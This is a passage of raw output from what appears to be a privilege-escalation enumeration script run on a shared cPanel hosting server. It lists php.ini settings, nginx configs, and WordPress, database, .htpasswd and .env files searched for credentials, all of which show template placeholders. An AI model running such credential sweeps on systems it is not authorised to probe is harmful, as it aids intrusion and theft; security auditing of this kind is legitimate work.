Off allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On sybase.allow_persistent = On sybct.allow_persistent = On ifx.allow_persistent = On mssql.allow_persistent = On -rw-r--r-- 1 root linksafe 43921 Dec 23 03:37 /opt/alt/php70/etc/php.ini allow_call_time_pass_reference = Off allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On ifx.allow_persistent = On -rw-r--r-- 1 root linksafe 43921 Dec 23 03:37 /opt/alt/php71/etc/php.ini allow_call_time_pass_reference = Off allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On ifx.allow_persistent = On -rw-r--r-- 1 root linksafe 41349 Dec 23 03:37 /opt/alt/php72/etc/php.ini allow_call_time_pass_reference = Off allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root linksafe 41321 Dec 23 03:37 /opt/alt/php73/etc/php.ini allow_call_time_pass_reference = Off allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root linksafe 41322 Dec 23 03:37 /opt/alt/php74/etc/php.ini allow_call_time_pass_reference = Off allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root linksafe 62431 Dec 23 03:37 /opt/alt/php80/etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root linksafe 62431 Dec 23 03:37 /opt/alt/php81/etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root linksafe 62431 Dec 23 03:37 /opt/alt/php82/etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60034 Sep 19 2024 /opt/cpanel/ea-php56/root/etc/php.ini allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60876 Sep 19 2024 /opt/cpanel/ea-php70/root/etc/php.ini allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60876 Sep 19 2024 /opt/cpanel/ea-php71/root/etc/php.ini allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60876 Sep 19 2024 /opt/cpanel/ea-php72/root/etc/php.ini allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60876 Sep 19 2024 /opt/cpanel/ea-php73/root/etc/php.ini allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60875 Sep 19 2024 /opt/cpanel/ea-php74/root/etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60875 Sep 19 2024 /opt/cpanel/ea-php80/root/etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60875 Sep 19 2024 /opt/cpanel/ea-php81/root/etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On lrwxrwxrwx 1 root root 27 Dec 23 03:37 /opt/cpanel/ea-php82/root/etc/php.ini -> /etc/cl.selector/ea-php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60877 May 22 2025 /opt/cpanel/ea-php83/root/etc/php.ini allow_url_fopen = Off allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 60877 Dec 8 08:17 /opt/cpanel/ea-php84/root/etc/php.ini allow_url_fopen = Off allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = 1 mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 cpguard cpguard 919 Feb 6 2025 /opt/cpguard/app/cpguard/core/scanner/decode/php.ini allow_url_fopen = Off ; Disable remote file includes allow_url_include = Off ; Prevent remote PHP execution -rw-r--r-- 1 cpguard cpguard 72823 Sep 18 06:16 /opt/cpguard/cpg-php-fpm/etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 39852 Sep 19 2024 /usr/local/lsws/add-ons/directadmin/php.ini allow_call_time_pass_reference = On allow_url_fopen = On odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On sybase.allow_persistent = On sybct.allow_persistent = On ifx.allow_persistent = On mssql.allow_persistent = On ingres.allow_persistent = On -rw-r--r-- 1 root root 37999 Sep 19 2024 /usr/local/lsws/admin/misc/php.ini allow_call_time_pass_reference = Off allow_url_fopen = On odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On sybase.allow_persistent = On sybct.allow_persistent = On ifx.allow_persistent = On mssql.allow_persistent = On ingres.allow_persistent = On -rw-r--r-- 1 root root 442 Jul 15 2024 /usr/local/sitepad/lib/panels/directadmin/php.ini -rw-r--r-- 1 root root 422 Jul 15 2024 /usr/local/sitepad/lib/panels/pdadmin/php.ini -rw-r--r-- 1 root linksafe 0 Sep 19 2024 /usr/selector.etc/php.ini -rw-r--r-- 1 root root 717 Apr 1 2025 /opt/cpanel/ea-ruby27/src/passenger-release-6.0.27/dev/vagrant/nginx.conf daemon off; worker_processes  1; events {     worker_connections  1024; } http {     include       mime.types;     default_type  application/octet-stream;     sendfile        on;     keepalive_timeout  65;     passenger_root /vagrant;     passenger_ruby /usr/bin/ruby;     passenger_log_level 1;     server {         listen       8100;         server_name  localhost;         location / {             root   html;             index  index.html index.htm;         }     }     server {         listen 8101;         server_name rack.test;         root /vagrant/dev/rack.test/public;         passenger_enabled on;     } } -rw-r--r-- 1 cpguard cpguard 1784 Jun 18 2025 /opt/cpguard/cpg-nginx/conf/nginx.conf worker_processes  1; pid        /opt/cpguard/cpg-nginx/nginx.pid; events {     worker_connections  1024; } http {     include       mime.types;     default_type  application/octet-stream;     sendfile        on;     server_tokens off;     server {         listen       9098 ssl;         server_name  HOSTNAME;         access_log off;         ssl_certificate      /opt/cpguard/cpg-nginx/ssl/cpg.pem;         ssl_certificate_key  /opt/cpguard/cpg-nginx/ssl/cpg.key;         ssl_session_cache    shared:SSL:1m;         ssl_session_timeout  5m;         ssl_ciphers  HIGH:!aNULL:!MD5;         ssl_prefer_server_ciphers  on;         location ^~ /api {            alias /opt/cpguard/app/api/public;            index index.php;            try_files $uri $uri/ @api;         location ~ \.php {             fastcgi_pass   unix:/opt/cpguard/cpg-php-fpm/var/run/cpgphp-cgi.sock;             fastcgi_index  index.php;             fastcgi_param SCRIPT_FILENAME $request_filename;             include        fastcgi_params;                 }         }  }         location @api {                 rewrite /api/(.*)$ /api/index.php?/$1 last;         }     } } drwxr-xr-x 2 root root 4096 Nov 6 14:01 /opt/cpanel/ea-ruby27/root/usr/share/passenger/phusion_passenger/nginx drwxr-xr-x 2 root root 4096 Nov 6 14:01 /opt/cpanel/ea-ruby27/root/usr/share/passenger/templates/nginx drwxr-xr-x 2 root root 4096 Nov 6 14:01 /opt/cpanel/ea-ruby27/src/passenger-release-6.0.27/dev/ci/tests/nginx drwxr-xr-x 2 root root 4096 Nov 6 14:01 /opt/cpanel/ea-ruby27/src/passenger-release-6.0.27/resources/templates/nginx drwxr-xr-x 2 root root 4096 Nov 6 14:01 /opt/cpanel/ea-ruby27/src/passenger-release-6.0.27/src/ruby_supportlib/phusion_passenger/nginx -rwxr-xr-x 1 cpguard cpguard 6025680 Jul 12 2024 /opt/cpguard/cpg-nginx/sbin/nginx ╔══════════╣ Analyzing Wordpress Files (limit 70) -rw-r--r-- 1 root root 3144 Feb 25 2025 /var/softaculous/bbpress/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2850 Feb 25 2025 /var/softaculous/bbpress/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3520 Feb 23 2024 /var/softaculous/classicpress/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3227 Feb 23 2024 /var/softaculous/classicpress/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3449 Apr 16 2025 /var/softaculous/wp/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3156 Nov 13 2024 /var/softaculous/wp/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2969 Dec 23 2021 /var/softaculous/wp49/_wp-config.php define('DB_NAME', '[[softdb]]'); define('DB_USER', '[[softdbuser]]'); define('DB_PASSWORD', '[[softdbpass]]'); define('DB_HOST', '[[softdbhost]]'); -rw-r--r-- 1 root root 2686 Dec 23 2021 /var/softaculous/wp49/wp-config.php define('DB_NAME', '[[softdb]]'); define('DB_USER', '[[softdbuser]]'); define('DB_PASSWORD', '[[softdbpass]]'); define('DB_HOST', '[[softdbhost]]'); -rw-r--r-- 1 root root 2969 Dec 23 2021 /var/softaculous/wp50/_wp-config.php define('DB_NAME', '[[softdb]]'); define('DB_USER', '[[softdbuser]]'); define('DB_PASSWORD', '[[softdbpass]]'); define('DB_HOST', '[[softdbhost]]'); -rw-r--r-- 1 root root 2686 Dec 23 2021 /var/softaculous/wp50/wp-config.php define('DB_NAME', '[[softdb]]'); define('DB_USER', '[[softdbuser]]'); define('DB_PASSWORD', '[[softdbpass]]'); define('DB_HOST', '[[softdbhost]]'); -rw-r--r-- 1 root root 3013 Dec 23 2021 /var/softaculous/wp51/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2730 Dec 23 2021 /var/softaculous/wp51/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3013 Dec 23 2021 /var/softaculous/wp52/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2730 Dec 23 2021 /var/softaculous/wp52/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3013 Dec 23 2021 /var/softaculous/wp53/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2730 Dec 23 2021 /var/softaculous/wp53/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3028 Dec 23 2021 /var/softaculous/wp54/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2745 Dec 23 2021 /var/softaculous/wp54/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3028 Dec 23 2021 /var/softaculous/wp55/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2745 Dec 23 2021 /var/softaculous/wp55/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3052 Dec 23 2021 /var/softaculous/wp56/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2768 Dec 23 2021 /var/softaculous/wp56/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3052 Dec 23 2021 /var/softaculous/wp57/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2768 Dec 23 2021 /var/softaculous/wp57/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3147 Jan 25 2022 /var/softaculous/wp58/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2853 Jan 25 2022 /var/softaculous/wp58/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3144 May 25 2022 /var/softaculous/wp59/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2850 May 25 2022 /var/softaculous/wp59/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3144 Nov 2 2022 /var/softaculous/wp60/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2850 Nov 2 2022 /var/softaculous/wp60/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3144 Apr 3 2023 /var/softaculous/wp61/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2850 Apr 3 2023 /var/softaculous/wp61/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3156 Aug 9 2023 /var/softaculous/wp62/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2863 Aug 9 2023 /var/softaculous/wp62/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3156 Nov 8 2023 /var/softaculous/wp63/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2863 Nov 8 2023 /var/softaculous/wp63/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3156 Apr 3 2024 /var/softaculous/wp64/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2863 Apr 3 2024 /var/softaculous/wp64/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3155 Jul 17 2024 /var/softaculous/wp65/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2862 Jul 17 2024 /var/softaculous/wp65/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3176 Nov 13 2024 /var/softaculous/wp66/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 2883 Nov 13 2024 /var/softaculous/wp66/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3473 Apr 15 2025 /var/softaculous/wp67/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3180 Apr 15 2025 /var/softaculous/wp67/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3473 Dec 3 01:24 /var/softaculous/wp68/_wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); -rw-r--r-- 1 root root 3180 Dec 3 01:24 /var/softaculous/wp68/wp-config.php define( 'DB_NAME', '[[softdb]]' ); define( 'DB_USER', '[[softdbuser]]' ); define( 'DB_PASSWORD', '[[softdbpass]]' ); define( 'DB_HOST', '[[softdbhost]]' ); ╔══════════╣ Analyzing Moodle Files (limit 70) -rw-r--r-- 1 root root 716 Dec 23 2021 /var/softaculous/moodle/config.php $CFG->dbtype = 'mysqli'; $CFG->dbhost = '[[softdbhost]]'; $CFG->dbuser = '[[softdbuser]]'; $CFG->dbpass = '[[softdbpass]]'; 'dbport' => '', ╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x 2 root root 4096 Dec 23 03:37 /etc/pam.d ╔══════════╣ Analyzing VNC Files (limit 70)  -rw-r--r-- 1 root root 475 Mar 11 2025 /usr/lib/firewalld/services/vnc-server.xml    Virtual Network Computing Server (VNC)  A VNC server provides an external accessible X session. Enable this option if you plan to provide a VNC server with direct access. The access will be possible for displays :0 to :3. If you plan to provide access with SSH, do not open this option and use the via option of the VNC viewer.    ╔══════════╣ Analyzing Redis Files (limit 70) redis-server Not Found lrwxrwxrwx 1 root root 16 Sep 19 2024 /opt/alt/redis/etc/redis.conf -> redis/redis.conf ╔══════════╣ Analyzing Backup Manager Files (limit 70)  -rwxr-xr-x 1 root root 382 Dec 23 2021 /var/softaculous/conc/database.php 'database' => '[[softdb]]', 'password' => '[[softdbpass]]', -rw-r--r-- 1 root root 431 Dec 23 2021 /var/softaculous/conc8/database.php 'database' => '[[softdb]]', 'password' => '[[softdbpass]]', -rw-r--r-- 1 root root 419 Dec 23 2021 /var/softaculous/conc85/database.php 'database' => '[[softdb]]', 'password' => '[[softdbpass]]', -rw-r--r-- 1 root root 1612 Dec 23 2021 /var/softaculous/gallery/database.php 'user' => '[[softdbuser]]', 'pass' => '[[softdbpass]]', 'host' => '[[softdbhost]]', 'database' => '[[softdb]]', -rwxr-xr-x 1 root root 4597 Dec 23 2021 /var/softaculous/jorani/database.php | ['password'] The password used to connect to the database | ['database'] The name of the database you want to connect to 'password' => '[[softdbpass]]', 'database' => '[[softdb]]', -rwxr-xr-x 1 root root 228 Dec 23 2021 /var/softaculous/koken/database.php 'database' => '[[softdb]]', 'password' => '[[softdbpass]]', -rwxr-xr-x 1 root root 259 Dec 23 2021 /var/softaculous/leafpub/database.php 'host' => '[[softdbhost]]', 'database' => '[[softdb]]', 'user' => '[[softdbuser]]', 'password' => '[[softdbpass]]', -rw-r--r-- 1 root root 1400 May 22 2024 /var/softaculous/microweber/database.php 'database' => storage_path().DIRECTORY_SEPARATOR.'database.sqlite', 'host' => '[[softdbhost]]', 'database' => '[[softdb]]', 'password' => '[[softdbpass]]', 'host' => '127.0.0.1', 'database' => 'laravel', 'password' => '', 'host' => 'localhost', 'database' => 'database', 'password' => '', 'host' => '127.0.0.1', 'database' => 0, -rwxr-xr-x 1 root root 4702 Feb 21 2022 /var/softaculous/october/database.php 'database' => 'storage/database.sqlite', 'host' => '[[softdbhost]]', 'database' => '[[softdb]]', 'password' => '[[softdbpass]]', 'host' => 'localhost', 'database' => 'database', 'password' => '', 'host' => 'localhost', 'database' => 'database', 'password' => '', 'host' => '127.0.0.1', 'password' => null, 'database' => 0, -rwxr-xr-x 1 root root 4569 Dec 23 2021 /var/softaculous/openb/database.php | ['password'] The password used to connect to the database | ['database'] The name of the database you want to connect to 'password' => '[[softdbpass]]', 'database' => '[[softdb]]', -rwxr-xr-x 1 root root 615 Dec 23 2021 /var/softaculous/openeshop/database.php 'password' => '[[softdbpass]]', 'database' => '[[softdb]]', -rwxr-xr-x 1 root root 3819 Dec 23 2021 /var/softaculous/readerself/database.php | ['password'] The password used to connect to the database | ['database'] The name of the database you want to connect to 'password' => '[[softdbpass]]', 'database' => '[[softdb]]', -rw-r--r-- 1 root root 320 May 26 2022 /var/softaculous/ruko/database.php -rw-r--r-- 1 root root 916 Aug 29 03:57 /var/softaculous/slims/database.php 'host' => '[[softdbhost]]', 'database' => '[[softdb]]', 'password' => '[[softdbpass]]', -rw-r--r-- 1 root root 235 Dec 23 2021 /var/softaculous/traq/database.php 'host' => "[[softdbhost]]", 'password' => "[[softdbpass]]", 'database' => "[[softdb]]", -rw-r--r-- 1 root root 3587 Dec 23 2021 /var/softaculous/unmark/database.php | ['password'] The password used to connect to the database | ['database'] The name of the database you want to connect to $db['default']['password'] = '[[softdbpass]]'; $db['default']['database'] = '[[softdb]]'; -rw-r--r-- 1 root root 5044 Oct 27 2022 /var/softaculous/wintercms/database.php 'database' => env('DB_DATABASE', storage_path('database.sqlite')), 'database' => env('DB_DATABASE', '[[softdb]]'), 'host' => env('DB_HOST', '[[softdbhost]]'), 'password' => env('DB_PASSWORD', '[[softdbpass]]'), 'database' => env('DB_DATABASE', 'winter'), 'host' => env('DB_HOST', '127.0.0.1'), 'password' => env('DB_PASSWORD', ''), 'database' => env('DB_DATABASE', 'winter'), 'host' => env('DB_HOST', '127.0.0.1'), 'password' => env('DB_PASSWORD', ''), 'database' => env('REDIS_DB', '0'), 'host' => env('REDIS_HOST', '127.0.0.1'), 'password' => env('REDIS_PASSWORD'), 'database' => env('REDIS_CACHE_DB', '1'), 'host' => env('REDIS_HOST', '127.0.0.1'), 'password' => env('REDIS_PASSWORD'), ╔══════════╣ Analyzing FastCGI Files (limit 70) -rw-r--r-- 1 cpguard cpguard 1007 Jul 12 2024 /opt/cpguard/cpg-nginx/conf/fastcgi_params ╔══════════╣ Analyzing Postfix Files (limit 70) drwxr-xr-x 8 root root 4096 Sep 30 09:45 /var/softaculous/postfix ╔══════════╣ Analyzing Http conf Files (limit 70) -rw-r--r-- 1 root root 0 Sep 19 2024 /usr/local/lsws/add-ons/frontpage/conf/httpd.conf ╔══════════╣ Analyzing Htpasswd Files (limit 70) -rwxr-xr-x 1 root root 33 Dec 23 2021 /var/softaculous/easyp/.htpasswd [[admin_username]]:[[admin_pass]] -rwxr-xr-x 1 root root 34 Dec 23 2021 /var/softaculous/framadate/.htpasswd [[admin_username]]:[[admin_pass]] -rw-r--r-- 1 root root 14 Dec 23 2021 /var/softaculous/kirby/.htpasswd [[admin_pass]] -rw-r--r-- 1 root root 103 Dec 23 2021 /var/softaculous/lepton/.htpasswd [[admin_username]]:[[htpassword]] ╔══════════╣ Analyzing Env Files (limit 70) -rw-r--r-- 1 root root 727 Jun 2 2022 /var/softaculous/akaunting/.env APP_NAME=Akaunting APP_ENV=production APP_LOCALE=[[language]] APP_INSTALLED=true APP_KEY=base64:[[APP_KEY]] APP_DEBUG=false APP_SCHEDULE_TIME="09:00" APP_URL=[[softurl]] DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD="[[softdbpass]]" DB_PREFIX=[[dbprefix]] BROADCAST_DRIVER=log CACHE_DRIVER=file SESSION_DRIVER=file QUEUE_CONNECTION=sync LOG_CHANNEL=stack LOG_DEPRECATIONS_CHANNEL=null LOG_LEVEL=debug MAIL_MAILER=mail MAIL_HOST=localhost MAIL_PORT=2525 MAIL_USERNAME=null MAIL_PASSWORD=null MAIL_ENCRYPTION=null MAIL_FROM_NAME=null MAIL_FROM_ADDRESS=null FIREWALL_ENABLED=true MODEL_CACHE_ENABLED=true DEBUGBAR_EDITOR=vscode IGNITION_EDITOR=vscode -rwxr-xr-x 1 root root 231 Dec 23 2021 /var/softaculous/atlantis/.env APP_ENV=local APP_DEBUG=false APP_KEY=[[APP_KEY]] DB_HOST=[[softdbhost]] DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] CACHE_DRIVER=file SESSION_DRIVER=file ATLANTIS_INSTALL=true MULTI_SITES=false -rwxr-xr-x 1 root root 1345 Jun 6 2022 /var/softaculous/attendize/.env ATTENDIZE_DEV=true ATTENDIZE_CLOUD=false APP_NAME=Attendize APP_ENV=production APP_KEY=[[APP_KEY]] APP_DEBUG=false APP_URL=[[softurl]] LOG_CHANNEL=stack DB_CONNECTION=mysql DB_HOST=[[softdbhost]] DB_PORT=3306 DB_DATABASE=[[softdb]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] BROADCAST_DRIVER=log CACHE_DRIVER=file QUEUE_CONNECTION=sync SESSION_DRIVER=file SESSION_LIFETIME=120 REDIS_HOST=127.0.0.1 